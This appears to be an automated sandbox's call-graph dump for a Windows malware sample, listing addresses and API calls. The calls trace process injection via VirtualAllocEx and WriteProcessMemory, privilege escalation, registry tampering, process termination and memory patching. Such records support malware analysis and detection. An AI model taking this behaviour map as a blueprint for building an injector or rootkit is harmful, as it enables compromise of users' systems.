140001868 31 API calls 8101->8098 8103 140001cd1 8102->8103 8104 1400018b0 IsWow64Process 8102->8104 8103->8101 8105 1400018c7 FindCloseChangeNotification 8104->8105 8105->8103 8107 1400018ed 8105->8107 8107->8103 8108 14000192f OpenProcess 8107->8108 8108->8103 8109 14000194b OpenProcess 8108->8109 8110 140001a04 NtQueryInformationProcess 8109->8110 8111 14000196a K32GetModuleFileNameExW 8109->8111 8112 140001cc8 CloseHandle 8110->8112 8113 140001a29 8110->8113 8114 1400019b3 CloseHandle 8111->8114 8115 140001983 PathFindFileNameW lstrlenW 8111->8115 8112->8103 8113->8112 8116 140001a33 OpenProcessToken 8113->8116 8114->8110 8118 1400019c1 8114->8118 8115->8114 8117 1400019a0 StrCpyW 8115->8117 8116->8112 8119 140001a51 GetTokenInformation 8116->8119 8117->8114 8118->8110 8120 1400019e0 StrCmpIW 8118->8120 8121 140001af4 8119->8121 8122 140001a79 GetLastError 8119->8122 8120->8112 8120->8118 8124 140001afb CloseHandle 8121->8124 8122->8121 8123 140001a84 LocalAlloc 8122->8123 8123->8121 8125 140001a9a GetTokenInformation 8123->8125 8124->8112 8129 140001b0f 8124->8129 8126 140001ae2 8125->8126 8127 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 8125->8127 8128 140001ae9 LocalFree 8126->8128 8127->8128 8128->8124 8129->8112 8130 140001b9f StrStrA 8129->8130 8131 140001bc8 8129->8131 8130->8129 8132 140001bcd 8130->8132 8131->8112 8132->8112 8133 140001bf8 VirtualAllocEx 8132->8133 8133->8112 8134 140001c27 WriteProcessMemory 8133->8134 8134->8112 8135 140001c46 8134->8135 8143 140002bfc 8135->8143 8137 140001c66 8137->8112 8138 140001c74 WaitForSingleObject 8137->8138 8139 140001c83 GetExitCodeThread 8138->8139 8140 140001cbd FindCloseChangeNotification 8138->8140 8141 140001ca2 VirtualFreeEx 8139->8141 8142 140001c99 8139->8142 8140->8112 8141->8140 8142->8141 8146 1400020cc GetModuleHandleA 8143->8146 8147 1400020f5 8146->8147 8148 1400020ec GetProcAddress 8146->8148 8148->8147 9288 2d8b0a6fc4c 9289 2d8b0a6fc6e 9288->9289 9290 2d8b0a6fc8b 9288->9290 9289->9290 9291 2d8b0a6fc7c 9289->9291 9292 2d8b0a6fc95 9290->9292 9297 2d8b0a72408 9290->9297 9293 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9291->9293 9304 2d8b0a72444 9292->9304 9296 2d8b0a6fc81 _invalid_parameter_noinfo 9293->9296 9298 2d8b0a7242a HeapSize 9297->9298 9299 2d8b0a72411 9297->9299 9300 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9299->9300 9301 2d8b0a72416 9300->9301 9302 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 9301->9302 9303 2d8b0a72421 9302->9303 9303->9292 9305 2d8b0a72459 9304->9305 9306 2d8b0a72463 9304->9306 9308 2d8b0a6d35c 12 API calls 9305->9308 9307 2d8b0a72468 9306->9307 9314 2d8b0a7246f _invalid_parameter_noinfo 9306->9314 9309 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9307->9309 9312 2d8b0a72461 9308->9312 9309->9312 9310 2d8b0a72475 9313 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9310->9313 9311 2d8b0a724a2 HeapReAlloc 9311->9312 9311->9314 9312->9296 9313->9312 9314->9310 9314->9311 9315 2d8b0a6c1ac _invalid_parameter_noinfo 2 API calls 9314->9315 9315->9314 9655 2d8b0a62bc8 9656 2d8b0a62c39 9655->9656 9657 2d8b0a62f5c 9656->9657 9658 2d8b0a62c65 GetModuleHandleA 9656->9658 9659 2d8b0a62c89 9658->9659 9660 2d8b0a62c77 GetProcAddress 9658->9660 9659->9657 9661 2d8b0a62cb0 StrCmpNIW 9659->9661 9660->9659 9661->9657 9667 2d8b0a62cd5 9661->9667 9662 2d8b0a6193c 6 API calls 9662->9667 9663 2d8b0a62de7 lstrlenW 9663->9667 9664 2d8b0a62e91 lstrlenW 9664->9667 9665 2d8b0a61c08 StrCmpIW StrCmpW 9665->9667 9666 2d8b0a63c40 StrCmpNIW 9666->9667 9667->9657 9667->9662 9667->9663 9667->9664 9667->9665 9667->9666 8167 140002d38 8170 140002d4c 8167->8170 8215 140002a0c 8170->8215 8173 140002a0c 14 API calls 8174 140002d74 GetCurrentProcessId OpenProcess 8173->8174 8175 140002d94 OpenProcessToken 8174->8175 8176 140002e06 RegOpenKeyExW 8174->8176 8177 140002da8 LookupPrivilegeValueW 8175->8177 8178 140002dfd CloseHandle 8175->8178 8179 140002e37 RegQueryValueExW 8176->8179 8180 140002d41 ExitProcess 8176->8180 8177->8178 8181 140002dbf AdjustTokenPrivileges 8177->8181 8178->8176 8179->8180 8182 140002e67 RegQueryValueExW 8179->8182 8181->8178 8183 140002df7 GetLastError 8181->8183 8182->8180 8184 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 8182->8184 8183->8178 8184->8180 8185 140002f09 RegQueryValueExW 8184->8185 8185->8180 8186 140002f39 RegCloseKey GetCurrentProcessId 8185->8186 8229 14000200c GetProcessHeap HeapAlloc 8186->8229 8188 140002f50 RegCreateKeyExW 8189 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 8188->8189 8190 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 8188->8190 8193 14000151c 50 API calls 8189->8193 8191 140002fb5 RegSetKeySecurity LocalFree 8190->8191 8192 140002fcf RegCreateKeyExW 8190->8192 8191->8192 8194 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 8192->8194 8195 140003040 RegCloseKey 8192->8195 8196 1400030d4 8193->8196 8194->8195 8195->8189 8197 140003112 8196->8197 8198 1400030e0 ShellExecuteW 8196->8198 8199 14000148c 6 API calls 8197->8199 8198->8197 8198->8198 8200 14000311a 8199->8200 8201 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8200->8201 8202 140003123 8201->8202 8203 14000148c 6 API calls 8202->8203 8204 14000312c 8203->8204 8205 14000148c 6 API calls 8204->8205 8206 140003135 8205->8206 8207 14000148c 6 API calls 8206->8207 8208 14000313e 8207->8208 8209 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8208->8209 8210 140003147 8209->8210 8211 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8210->8211 8212 140003150 8211->8212 8213 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8212->8213 8214 140003159 GetProcessHeap HeapFree SleepEx 8213->8214 8214->8180 8216 140002a15 StrCpyW StrCatW GetModuleHandleW 8215->8216 8217 140002bdf 8215->8217 8216->8217 8218 140002a66 GetCurrentProcess K32GetModuleInformation 8216->8218 8217->8173 8219 140002bd6 FreeLibrary 8218->8219 8220 140002a96 CreateFileW 8218->8220 8219->8217 8220->8219 8221 140002acb CreateFileMappingW 8220->8221 8222 140002af4 MapViewOfFile 8221->8222 8223 140002bcd CloseHandle 8221->8223 8224 140002bc4 FindCloseChangeNotification 8222->8224 8225 140002b17 8222->8225 8223->8219 8224->8223 8225->8224 8226 140002b30 lstrcmpi 8225->8226 8228 140002b6e 8225->8228 8226->8225 8227 140002b70 VirtualProtect VirtualProtect 8226->8227 8227->8224 8228->8224 8235 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 8229->8235 8231 1400020a5 GetProcessHeap HeapFree 8232 140002050 8232->8231 8233 140002071 OpenProcess 8232->8233 8233->8232 8234 140002087 TerminateProcess CloseHandle 8233->8234 8234->8232 8236 140001d7d 8235->8236 8237 140001e4f GetProcessHeap HeapFree GetProcessHeap RtlDeleteBoundaryDescriptor 8235->8237 8236->8237 8238 140001d92 OpenProcess 8236->8238 8240 140001e3a FindCloseChangeNotification 8236->8240 8241 140001de9 ReadProcessMemory 8236->8241 8237->8232 8238->8236 8239 140001daf K32EnumProcessModulesEx 8238->8239 8239->8236 8239->8240 8240->8236 8242 140001e0b 8241->8242 8242->8236 8242->8240 8242->8241 8939 2d8b0a61ad0 8946 2d8b0a61630 GetProcessHeap HeapAlloc 8939->8946 8941 2d8b0a61adf 8942 2d8b0a61ae6 Sleep 8941->8942 8945 2d8b0a615a0 StrCmpIW StrCmpW 8941->8945 8997 2d8b0a618bc 8941->8997 8943 2d8b0a61630 50 API calls 8942->8943 8943->8941 8945->8941 9014 2d8b0a61268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8946->9014 8948 2d8b0a61658 9015 2d8b0a61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8948->9015 8950 2d8b0a61660 9016 2d8b0a61268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8950->9016 8952 2d8b0a61669 9017 2d8b0a61268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8952->9017 8954 2d8b0a61672 9018 2d8b0a61268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8954->9018 8956 2d8b0a6167b 9019 2d8b0a61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8956->9019 8958 2d8b0a61684 9020 2d8b0a61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8958->9020 8960 2d8b0a6168d 9021 2d8b0a61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8960->9021 8962 2d8b0a61696 RegOpenKeyExW 8963 2d8b0a618ae 8962->8963 8964 2d8b0a616c8 RegOpenKeyExW 8962->8964 8963->8941 8965 2d8b0a61707 RegOpenKeyExW 8964->8965 8966 2d8b0a616f1 8964->8966 8967 2d8b0a6172b 8965->8967 8968 2d8b0a61742 RegOpenKeyExW 8965->8968 9022 2d8b0a612bc RegQueryInfoKeyW 8966->9022 9031 2d8b0a6104c RegQueryInfoKeyW 8967->9031 8971 2d8b0a6177d RegOpenKeyExW 8968->8971 8972 2d8b0a61766 8968->8972 8976 2d8b0a617b8 RegOpenKeyExW 8971->8976 8977 2d8b0a617a1 8971->8977 8975 2d8b0a612bc 16 API calls 8972->8975 8978 2d8b0a61773 RegCloseKey 8975->8978 8980 2d8b0a617dc 8976->8980 8981 2d8b0a617f3 RegOpenKeyExW 8976->8981 8979 2d8b0a612bc 16 API calls 8977->8979 8978->8971 8984 2d8b0a617ae RegCloseKey 8979->8984 8985 2d8b0a612bc 16 API calls 8980->8985 8982 2d8b0a6182e RegOpenKeyExW 8981->8982 8983 2d8b0a61817 8981->8983 8987 2d8b0a61869 RegOpenKeyExW 8982->8987 8988 2d8b0a61852 8982->8988 8986 2d8b0a6104c 6 API calls 8983->8986 8984->8976 8989 2d8b0a617e9 RegCloseKey 8985->8989 8990 2d8b0a61824 RegCloseKey 8986->8990 8992 2d8b0a6188d 8987->8992 8993 2d8b0a618a4 RegCloseKey 8987->8993 8991 2d8b0a6104c 6 API calls 8988->8991 8989->8981 8990->8982 8994 2d8b0a6185f RegCloseKey 8991->8994 8995 2d8b0a6104c 6 API calls 8992->8995 8993->8963 8994->8987 8996 2d8b0a6189a RegCloseKey 8995->8996 8996->8993 9036 2d8b0a614a4 8997->9036 9014->8948 9015->8950 9016->8952 9017->8954 9018->8956 9019->8958 9020->8960 9021->8962 9023 2d8b0a6148a RegCloseKey 9022->9023 9024 2d8b0a61327 GetProcessHeap HeapAlloc 9022->9024 9023->8965 9025 2d8b0a61476 GetProcessHeap HeapFree 9024->9025 9026 2d8b0a61352 RegEnumValueW 9024->9026 9025->9023 9028 2d8b0a613a5 9026->9028 9027 2d8b0a61534 2 API calls 9027->9028 9028->9025 9028->9026 9028->9027 9029 2d8b0a6141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 9028->9029 9030 2d8b0a613d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9028->9030 9029->9028 9030->9029 9032 2d8b0a611b5 RegCloseKey 9031->9032 9034 2d8b0a610bf 9031->9034 9032->8968 9033 2d8b0a610cf RegEnumValueW 9033->9034 9034->9032 9034->9033 9035 2d8b0a6114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9034->9035 9035->9034 9037 2d8b0a614e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 9036->9037 9038 2d8b0a614c6 GetProcessHeap HeapFree 9036->9038 9038->9037 9038->9038 9668 2d8b0a63fd0 9671 2d8b0a63f1d _invalid_parameter_noinfo 9668->9671 9669 2d8b0a63f87 9670 2d8b0a63f6d VirtualQuery 9670->9669 9670->9671 9671->9669 9671->9670 9672 2d8b0a63fd2 GetLastError 9671->9672 9672->9671 9902 2d8b0a6b750 9903 2d8b0a6b77d __except_validate_context_record 9902->9903 9904 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9903->9904 9905 2d8b0a6b782 9904->9905 9907 2d8b0a6b7dc 9905->9907 9909 2d8b0a6b86a 9905->9909 9916 2d8b0a6b830 9905->9916 9906 2d8b0a6b8d8 9906->9916 9944 2d8b0a6aed0 9906->9944 9908 2d8b0a6b857 9907->9908 9907->9916 9917 2d8b0a6b7fe __FrameHandler3::FrameUnwindToEmptyState 9907->9917 9931 2d8b0a6a04c 9908->9931 9913 2d8b0a6b889 9909->9913 9938 2d8b0a6a448 9909->9938 9913->9906 9913->9916 9941 2d8b0a6a45c 9913->9941 9914 2d8b0a6b981 9917->9914 9919 2d8b0a6bc5c 9917->9919 9920 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 9919->9920 9921 2d8b0a6bc8b __FrameHandler3::FrameUnwindToEmptyState 9920->9921 9922 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9921->9922 9929 2d8b0a6bca8 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9922->9929 9923 2d8b0a6bd9f 9924 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9923->9924 9925 2d8b0a6bda4 9924->9925 9926 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9925->9926 9927 2d8b0a6bdaf __FrameHandler3::GetHandlerSearchState 9925->9927 9926->9927 9927->9916 9928 2d8b0a6a448 9 API calls Is_bad_exception_allowed 9928->9929 9929->9923 9929->9927 9929->9928 9930 2d8b0a6a470 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9929->9930 9930->9929 10001 2d8b0a6a0b0 9931->10001 9933 2d8b0a6a06b __FrameHandler3::FrameUnwindToEmptyState 10005 2d8b0a69fbc 9933->10005 9936 2d8b0a6bc5c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9937 2d8b0a6a0a0 9936->9937 9937->9916 9939 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9938->9939 9940 2d8b0a6a451 9939->9940 9940->9913 9942 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9941->9942 9943 2d8b0a6a465 9942->9943 9943->9906 10009 2d8b0a6bde8 9944->10009 9946 2d8b0a6b397 9947 2d8b0a6b2e8 9947->9946 9987 2d8b0a6b2e6 9947->9987 10062 2d8b0a6b3a0 9947->10062 9948 2d8b0a6b016 9948->9947 9991 2d8b0a6b04e 9948->9991 9950 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9953 2d8b0a6b32a 9950->9953 9951 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9954 2d8b0a6af7d 9951->9954 9953->9946 9955 2d8b0a67d30 _log10_special 8 API calls 9953->9955 9954->9953 9958 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9954->9958 9959 2d8b0a6b33d 9955->9959 9956 2d8b0a6b215 9957 2d8b0a6b236 9956->9957 9960 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 9956->9960 9956->9987 9963 2d8b0a6b258 9957->9963 9957->9987 10055 2d8b0a6a020 9957->10055 9962 2d8b0a6af8d 9958->9962 9959->9916 9960->9957 9964 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9962->9964 9965 2d8b0a6b26e 9963->9965 9966 2d8b0a6b37a 9963->9966 9963->9987 9967 2d8b0a6af96 9964->9967 9968 2d8b0a6b279 9965->9968 9971 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 9965->9971 9969 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9966->9969 10020 2d8b0a6a488 9967->10020 9975 2d8b0a6be80 9 API calls 9968->9975 9972 2d8b0a6b380 9969->9972 9971->9968 9974 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9972->9974 9976 2d8b0a6b389 9974->9976 9978 2d8b0a6b290 9975->9978 9980 2d8b0a6cff8 23 API calls 9976->9980 9977 2d8b0a6a45c 9 API calls 9977->9991 9982 2d8b0a6a0b0 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9978->9982 9978->9987 9979 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9981 2d8b0a6afd8 9979->9981 9980->9946 9981->9948 9983 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9981->9983 9984 2d8b0a6b2aa 9982->9984 9985 2d8b0a6afe4 9983->9985 10059 2d8b0a6a2b4 RtlUnwindEx 9984->10059 9988 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9985->9988 9987->9950 9990 2d8b0a6afed 9988->9990 10023 2d8b0a6be80 9990->10023 9991->9956 9991->9977 10034 2d8b0a6b610 9991->10034 10048 2d8b0a6adfc 9991->10048 9995 2d8b0a6b001 10030 2d8b0a6bf70 9995->10030 9997 2d8b0a6b374 9998 2d8b0a6cff8 23 API calls 9997->9998 9998->9966 9999 2d8b0a6b009 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9999->9997 10000 2d8b0a68e38 Concurrency::cancel_current_task 2 API calls 9999->10000 10000->9997 10002 2d8b0a6a0de __FrameHandler3::FrameUnwindToEmptyState 10001->10002 10003 2d8b0a6a150 10002->10003 10004 2d8b0a6a108 RtlLookupFunctionEntry 10002->10004 10003->9933 10004->10002 10006 2d8b0a6a007 10005->10006 10008 2d8b0a69fdc 10005->10008 10006->9936 10007 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10007->10008 10008->10006 10008->10007 10010 2d8b0a6be0d __FrameHandler3::FrameUnwindToEmptyState 10009->10010 10011 2d8b0a6a0b0 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 10010->10011 10012 2d8b0a6be22 10011->10012 10074 2d8b0a6aa58 10012->10074 10015 2d8b0a6be57 10016 2d8b0a6aa58 __GetUnwindTryBlock RtlLookupFunctionEntry 10015->10016 10018 2d8b0a6af31 10016->10018 10017 2d8b0a6be34 __FrameHandler3::GetHandlerSearchState 10077 2d8b0a6aa90 10017->10077 10018->9946 10018->9948 10018->9951 10021 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10020->10021 10022 2d8b0a6a496 10021->10022 10022->9946 10022->9979 10024 2d8b0a6bf67 10023->10024 10029 2d8b0a6beab 10023->10029 10025 2d8b0a6affd 10025->9948 10025->9995 10026 2d8b0a6a45c 9 API calls 10026->10029 10027 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 10027->10029 10028 2d8b0a6b610 9 API calls 10028->10029 10029->10025 10029->10026 10029->10027 10029->10028 10031 2d8b0a6bfdd 10030->10031 10033 2d8b0a6bf8d Is_bad_exception_allowed 10030->10033 10031->9999 10032 2d8b0a6a448 9 API calls Is_bad_exception_allowed 10032->10033 10033->10031 10033->10032 10035 2d8b0a6b6cc 10034->10035 10036 2d8b0a6b63d 10034->10036 10035->9991 10037 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 10036->10037 10038 2d8b0a6b646 10037->10038 10038->10035 10039 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 10038->10039 10040 2d8b0a6b65f 10038->10040 10039->10040 10040->10035 10041 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 10040->10041 10042 2d8b0a6b68b 10040->10042 10041->10042 10043 2d8b0a6a45c 9 API calls 10042->10043 10044 2d8b0a6b69f 10043->10044 10044->10035 10045 2d8b0a6b6b8 10044->10045 10046 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 10044->10046 10047 2d8b0a6a45c 9 API calls 10045->10047 10046->10045 10047->10035 10049 2d8b0a6a0b0 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 10048->10049 10050 2d8b0a6ae39 10049->10050 10051 2d8b0a6a448 Is_bad_exception_allowed 9 API calls 10050->10051 10052 2d8b0a6ae71 10051->10052 10053 2d8b0a6a2b4 9 API calls 10052->10053 10054 2d8b0a6aeb5 10053->10054 10054->9991 10056 2d8b0a6a034 __FrameHandler3::FrameUnwindToEmptyState 10055->10056 10057 2d8b0a69fbc __FrameHandler3::FrameUnwindToEmptyState 9 API calls 10056->10057 10058 2d8b0a6a03e 10057->10058 10058->9963 10060 2d8b0a67d30 _log10_special 8 API calls 10059->10060 10061 2d8b0a6a3ae 10060->10061 10061->9987 10063 2d8b0a6b3d9 10062->10063 10068 2d8b0a6b5ec 10062->10068 10064 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10063->10064 10065 2d8b0a6b3de 10064->10065 10066 2d8b0a6b3fd EncodePointer 10065->10066 10072 2d8b0a6b450 10065->10072 10067 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10066->10067 10069 2d8b0a6b40d 10067->10069 10068->9987 10069->10072 10080 2d8b0a69f68 10069->10080 10071 2d8b0a6a448 9 API calls Is_bad_exception_allowed 10071->10072 10072->10068 10072->10071 10073 2d8b0a6adfc 19 API calls 10072->10073 10073->10072 10075 2d8b0a6a0b0 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 10074->10075 10076 2d8b0a6aa6b 10075->10076 10076->10015 10076->10017 10078 2d8b0a6a0b0 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 10077->10078 10079 2d8b0a6aaaa 10078->10079 10079->10018 10081 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 10080->10081 10082 2d8b0a69f94 10081->10082 10082->10072 9316 2d8b0a67c1c 9317 2d8b0a67c3d 9316->9317 9318 2d8b0a67c38 9316->9318 9320 2d8b0a67d50 9318->9320 9321 2d8b0a67de7 9320->9321 9322 2d8b0a67d73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9320->9322 9321->9317 9322->9321 10083 2d8b0a6cf1c 10084 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 10083->10084 10085 2d8b0a6cf2c 10084->10085 10086 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 10085->10086 10087 2d8b0a6cf40 10086->10087 10088 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 10087->10088 10089 2d8b0a6cf54 10088->10089 10090 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 10089->10090 10091 2d8b0a6cf68 10090->10091 9039 2d8b0a62898 9041 2d8b0a628de 9039->9041 9040 2d8b0a62944 9041->9040 9042 2d8b0a63c40 StrCmpNIW 9041->9042 9042->9041 9323 2d8b0a65624 9324 2d8b0a6562a 9323->9324 9335 2d8b0a67c5c 9324->9335 9328 2d8b0a65727 _invalid_parameter_noinfo 9331 2d8b0a658ad 9328->9331 9334 2d8b0a6568e 9328->9334 9348 2d8b0a67830 9328->9348 9330 2d8b0a659ab 9331->9330 9332 2d8b0a65a27 VirtualProtect 9331->9332 9333 2d8b0a65a53 GetLastError 9332->9333 9332->9334 9333->9334 9336 2d8b0a67c67 9335->9336 9337 2d8b0a6566d 9336->9337 9338 2d8b0a6c1ac _invalid_parameter_noinfo 2 API calls 9336->9338 9339 2d8b0a67c86 9336->9339 9337->9334 9344 2d8b0a640b0 9337->9344 9338->9336 9340 2d8b0a67c91 9339->9340 9354 2d8b0a68478 9339->9354 9358 2d8b0a68498 9340->9358 9345 2d8b0a640cd 9344->9345 9347 2d8b0a6413c _invalid_parameter_noinfo 9345->9347 9367 2d8b0a64320 9345->9367 9347->9328 9349 2d8b0a67877 9348->9349 9392 2d8b0a67600 9349->9392 9352 2d8b0a67d30 _log10_special 8 API calls 9353 2d8b0a678a1 9352->9353 9353->9328 9355 2d8b0a68486 std::bad_alloc::bad_alloc 9354->9355 9362 2d8b0a68e38 9355->9362 9357 2d8b0a68497 9359 2d8b0a684a6 std::bad_alloc::bad_alloc 9358->9359 9360 2d8b0a68e38 Concurrency::cancel_current_task 2 API calls 9359->9360 9361 2d8b0a67c97 9360->9361 9363 2d8b0a68e57 9362->9363 9364 2d8b0a68ea2 RaiseException 9363->9364 9365 2d8b0a68e80 RtlPcToFileHeader 9363->9365 9364->9357 9366 2d8b0a68e98 9365->9366 9366->9364 9368 2d8b0a64344 9367->9368 9372 2d8b0a64367 9367->9372 9368->9372 9381 2d8b0a63dd0 9368->9381 9369 2d8b0a6439d 9370 2d8b0a643cd 9369->9370 9376 2d8b0a63f00 2 API calls 9369->9376 9374 2d8b0a64403 9370->9374 9379 2d8b0a63dd0 3 API calls 9370->9379 9372->9369 9387 2d8b0a63f00 9372->9387 9375 2d8b0a6441f 9374->9375 9377 2d8b0a63dd0 3 API calls 9374->9377 9378 2d8b0a6443b 9375->9378 9380 2d8b0a63f00 2 API calls 9375->9380 9376->9370 9377->9375 9378->9347 9379->9374 9380->9378 9386 2d8b0a63df1 _invalid_parameter_noinfo 9381->9386 9382 2d8b0a63e60 9382->9372 9383 2d8b0a63e46 VirtualQuery 9383->9382 9383->9386 9384 2d8b0a63e7a VirtualAlloc 9384->9382 9385 2d8b0a63eab GetLastError 9384->9385 9385->9382 9385->9386 9386->9382 9386->9383 9386->9384 9388 2d8b0a63f18 _invalid_parameter_noinfo 9387->9388 9389 2d8b0a63f6d VirtualQuery 9388->9389 9390 2d8b0a63f87 9388->9390 9391 2d8b0a63fd2 GetLastError 9388->9391 9389->9388 9389->9390 9390->9369 9391->9388 9393 2d8b0a6761b 9392->9393 9394 2d8b0a6763f 9393->9394 9395 2d8b0a67631 SetLastError 9393->9395 9394->9352 9395->9394 9043 2d8b0a6d2a4 9044 2d8b0a6d2ac 9043->9044 9046 2d8b0a6d2dd 9044->9046 9047 2d8b0a6d2d9 9044->9047 9049 2d8b0a6ff5c 9044->9049 9054 2d8b0a6d308 9046->9054 9050 2d8b0a6fce4 5 API calls 9049->9050 9051 2d8b0a6ff92 9050->9051 9052 2d8b0a6ff97 9051->9052 9053 2d8b0a6ffb1 InitializeCriticalSectionAndSpinCount 9051->9053 9052->9044 9053->9052 9055 2d8b0a6d333 9054->9055 9056 2d8b0a6d337 9055->9056 9057 2d8b0a6d316 DeleteCriticalSection 9055->9057 9056->9047 9057->9055 9673 2d8b0a6f9a4 GetCommandLineA GetCommandLineW 8319 2d8b0a703a0 8330 2d8b0a6d2ec EnterCriticalSection 8319->8330 8321 2d8b0a703b0 8322 2d8b0a7265c 55 API calls 8321->8322 8323 2d8b0a703b9 8322->8323 8324 2d8b0a703c7 8323->8324 8325 2d8b0a701a8 57 API calls 8323->8325 8326 2d8b0a6d340 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8324->8326 8328 2d8b0a703c2 8325->8328 8327 2d8b0a703d3 8326->8327 8329 2d8b0a70298 GetStdHandle GetFileType 8328->8329 8329->8324 10092 1400031d0 10093 1400031f7 10092->10093 10094 1400033e9 10092->10094 10095 140003357 GetProcessHeap HeapAlloc K32EnumProcesses 10093->10095 10096 1400031fd 10093->10096 10097 140003565 ReadFile 10094->10097 10098 1400033f5 10094->10098 10099 140003395 10095->10099 10115 140003295 10095->10115 10100 140003209 10096->10100 10101 14000334e ExitProcess 10096->10101 10102 14000358f 10097->10102 10097->10115 10103 14000355b 10098->10103 10104 1400033fe 10098->10104 10112 140001868 31 API calls 10099->10112 10099->10115 10106 1400032b6 RegOpenKeyExW 10100->10106 10116 140003212 10100->10116 10107 14000359c GetProcessHeap HeapAlloc 10102->10107 10102->10115 10105 140001f7c 22 API calls 10103->10105 10108 14000340a 10104->10108 10109 140003500 10104->10109 10105->10115 10113 1400032e3 RegDeleteValueW RegDeleteValueW RegDeleteValueW 10106->10113 10114 14000331f 10106->10114 10117 140001cf0 13 API calls 10107->10117 10110 14000344c 10108->10110 10118 14000340f 10108->10118 10111 1400020fc ReadFile 10109->10111 10168 1400020fc 10110->10168 10119 14000350f 10111->10119 10112->10099 10113->10114 10152 14000217c SysAllocString SysAllocString CoInitializeEx 10114->10152 10116->10115 10125 14000322c ReadFile 10116->10125 10132 1400035d5 10117->10132 10118->10115 10165 140002c5c 10118->10165 10119->10115 10128 1400020fc ReadFile 10119->10128 10124 14000332b 10130 14000217c 9 API calls 10124->10130 10125->10115 10131 140003256 10125->10131 10126 14000360a GetProcessHeap HeapFree 10126->10115 10134 140003526 10128->10134 10129 140003463 ReadFile 10129->10115 10135 14000348b 10129->10135 10136 140003337 10130->10136 10131->10115 10137 140001868 31 API calls 10131->10137 10132->10126 10138 1400034fb 10132->10138 10200 140001eec 10132->10200 10134->10115 10140 14000352e ShellExecuteW 10134->10140 10135->10115 10141 140003498 GetProcessHeap HeapAlloc ReadFile 10135->10141 10160 140001f7c GetProcessHeap HeapAlloc 10136->10160 10143 14000327c 10137->10143 10138->10126 10140->10115 10141->10126 10145 1400034dc 10141->10145 10147 140001868 31 API calls 10143->10147 10145->10126 10172 140002434 10145->10172 10147->10115 10153 1400022d8 SysFreeString SysFreeString 10152->10153 10154 1400021bd CoInitializeSecurity 10152->10154 10153->10124 10155 140002205 CoCreateInstance 10154->10155 10156 1400021f9 10154->10156 10157 1400022d2 CoUninitialize 10155->10157 10158 140002234 VariantInit 10155->10158 10156->10155 10156->10157 10157->10153 10159 14000228a 10158->10159 10159->10157 10161 140001cf0 13 API calls 10160->10161 10163 140001fba 